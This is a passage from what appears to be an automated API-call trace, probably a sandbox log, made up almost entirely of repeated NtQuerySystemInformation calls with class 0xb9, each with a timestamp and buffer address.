(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x28, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x50, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfa0, Length=0x28, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd010, Length=0x28, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fceb0, Length=0x20, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x38, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd730, Length=0x20, ResultLength=0x0) [0227.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.312] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.313] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x50, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.315] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3a0, Length=0x50, ResultLength=0x0) [0227.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.316] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.318] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0227.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.319] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.321] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1f0, Length=0x28, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x20, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2d0, Length=0x38, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.323] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 